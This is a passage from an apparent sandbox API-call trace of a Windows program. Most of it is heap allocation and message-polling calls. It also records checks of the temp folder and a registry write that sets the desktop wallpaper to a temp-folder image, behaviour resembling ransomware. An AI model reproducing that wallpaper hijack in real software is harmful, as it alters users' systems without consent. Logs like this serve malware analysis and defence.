dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0235.915] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0235.915] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0235.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0235.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0235.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.915] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0235.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0235.916] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0235.916] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0235.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0235.916] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0235.917] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.917] timeGetTime () returned 0x117aee9 [0235.917] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.917] Sleep (dwMilliseconds=0xa) [0235.956] timeGetTime () returned 0x117af18 [0235.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0235.956] Sleep (dwMilliseconds=0xa) [0236.002] timeGetTime () returned 0x117af47 [0236.002] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.002] Sleep (dwMilliseconds=0xa) [0236.059] timeGetTime () returned 0x117af76 [0236.059] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.059] Sleep (dwMilliseconds=0xa) [0236.084] timeGetTime () returned 0x117af95 [0236.084] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.084] Sleep (dwMilliseconds=0xa) [0236.096] timeGetTime () returned 0x117afa5 [0236.096] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.096] Sleep (dwMilliseconds=0xa) [0236.181] timeGetTime () returned 0x117aff3 [0236.181] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.181] Sleep (dwMilliseconds=0xa) [0236.206] timeGetTime () returned 0x117b012 [0236.206] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.206] Sleep (dwMilliseconds=0xa) [0236.221] timeGetTime () returned 0x117b021 [0236.221] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.221] Sleep (dwMilliseconds=0xa) [0236.237] timeGetTime () returned 0x117b031 [0236.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.237] Sleep (dwMilliseconds=0xa) [0236.252] timeGetTime () returned 0x117b041 [0236.252] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.252] Sleep (dwMilliseconds=0xa) [0236.268] timeGetTime () returned 0x117b050 [0236.268] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.268] Sleep (dwMilliseconds=0xa) [0236.283] timeGetTime () returned 0x117b060 [0236.283] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.283] Sleep (dwMilliseconds=0xa) [0236.299] timeGetTime () returned 0x117b070 [0236.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.299] Sleep (dwMilliseconds=0xa) [0236.315] timeGetTime () returned 0x117b07f [0236.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.315] Sleep (dwMilliseconds=0xa) [0236.330] timeGetTime () returned 0x117b08f [0236.330] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.330] Sleep (dwMilliseconds=0xa) [0236.347] timeGetTime () returned 0x117b09f [0236.347] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.347] Sleep (dwMilliseconds=0xa) [0236.362] timeGetTime () returned 0x117b0ae [0236.362] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.362] Sleep (dwMilliseconds=0xa) [0236.377] timeGetTime () returned 0x117b0be [0236.377] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.377] Sleep (dwMilliseconds=0xa) [0236.395] timeGetTime () returned 0x117b0cd [0236.395] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.395] Sleep (dwMilliseconds=0xa) [0236.410] timeGetTime () returned 0x117b0dd [0236.410] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.410] Sleep (dwMilliseconds=0xa) [0236.425] timeGetTime () returned 0x117b0ed [0236.425] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.425] Sleep (dwMilliseconds=0xa) [0236.440] timeGetTime () returned 0x117b0fc [0236.440] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.440] Sleep (dwMilliseconds=0xa) [0236.455] timeGetTime () returned 0x117b10c [0236.455] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.455] Sleep (dwMilliseconds=0xa) [0236.471] timeGetTime () returned 0x117b11c [0236.471] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.471] Sleep (dwMilliseconds=0xa) [0236.488] timeGetTime () returned 0x117b12b [0236.488] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.488] Sleep (dwMilliseconds=0xa) [0236.502] timeGetTime () returned 0x117b13b [0236.502] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.503] Sleep (dwMilliseconds=0xa) [0236.518] timeGetTime () returned 0x117b14a [0236.518] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0236.518] TranslateMessage (lpMsg=0x8cf798) returned 0 [0236.518] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0236.518] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0236.518] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0236.518] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.519] Sleep (dwMilliseconds=0xa) [0236.534] timeGetTime () returned 0x117b15a [0236.534] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.534] Sleep (dwMilliseconds=0xa) [0236.549] timeGetTime () returned 0x117b16a [0236.549] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.549] Sleep (dwMilliseconds=0xa) [0236.627] timeGetTime () returned 0x117b1b8 [0236.627] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.627] Sleep (dwMilliseconds=0xa) [0236.643] timeGetTime () returned 0x117b1c7 [0236.643] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.643] Sleep (dwMilliseconds=0xa) [0236.659] timeGetTime () returned 0x117b1d7 [0236.659] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.659] Sleep (dwMilliseconds=0xa) [0236.677] timeGetTime () returned 0x117b1e7 [0236.677] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.677] Sleep (dwMilliseconds=0xa) [0236.690] timeGetTime () returned 0x117b1f6 [0236.690] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.690] Sleep (dwMilliseconds=0xa) [0236.707] timeGetTime () returned 0x117b206 [0236.707] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.708] Sleep (dwMilliseconds=0xa) [0236.722] timeGetTime () returned 0x117b216 [0236.722] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.722] Sleep (dwMilliseconds=0xa) [0236.744] timeGetTime () returned 0x117b225 [0236.744] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.744] Sleep (dwMilliseconds=0xa) [0236.769] timeGetTime () returned 0x117b244 [0236.769] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.769] Sleep (dwMilliseconds=0xa) [0236.783] timeGetTime () returned 0x117b254 [0236.783] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.783] Sleep (dwMilliseconds=0xa) [0236.801] timeGetTime () returned 0x117b264 [0236.801] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.801] Sleep (dwMilliseconds=0xa) [0236.816] timeGetTime () returned 0x117b273 [0236.816] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.816] Sleep (dwMilliseconds=0xa) [0236.830] timeGetTime () returned 0x117b283 [0236.830] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.830] Sleep (dwMilliseconds=0xa) [0236.846] timeGetTime () returned 0x117b293 [0236.846] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.846] Sleep (dwMilliseconds=0xa) [0236.862] timeGetTime () returned 0x117b2a2 [0236.862] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.862] Sleep (dwMilliseconds=0xa) [0236.878] timeGetTime () returned 0x117b2b2 [0236.878] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.878] Sleep (dwMilliseconds=0xa) [0236.893] timeGetTime () returned 0x117b2c1 [0236.893] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0236.893] Sleep (dwMilliseconds=0xa) [0236.908] timeGetTime () returned 0x117b2d1 [0236.909] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.909] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0236.909] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0236.909] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0236.909] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0236.909] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0236.909] RegCloseKey (hKey=0x4e0) returned 0x0 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73488 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0236.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0236.910] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0236.910] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0236.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0236.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0236.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0236.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, 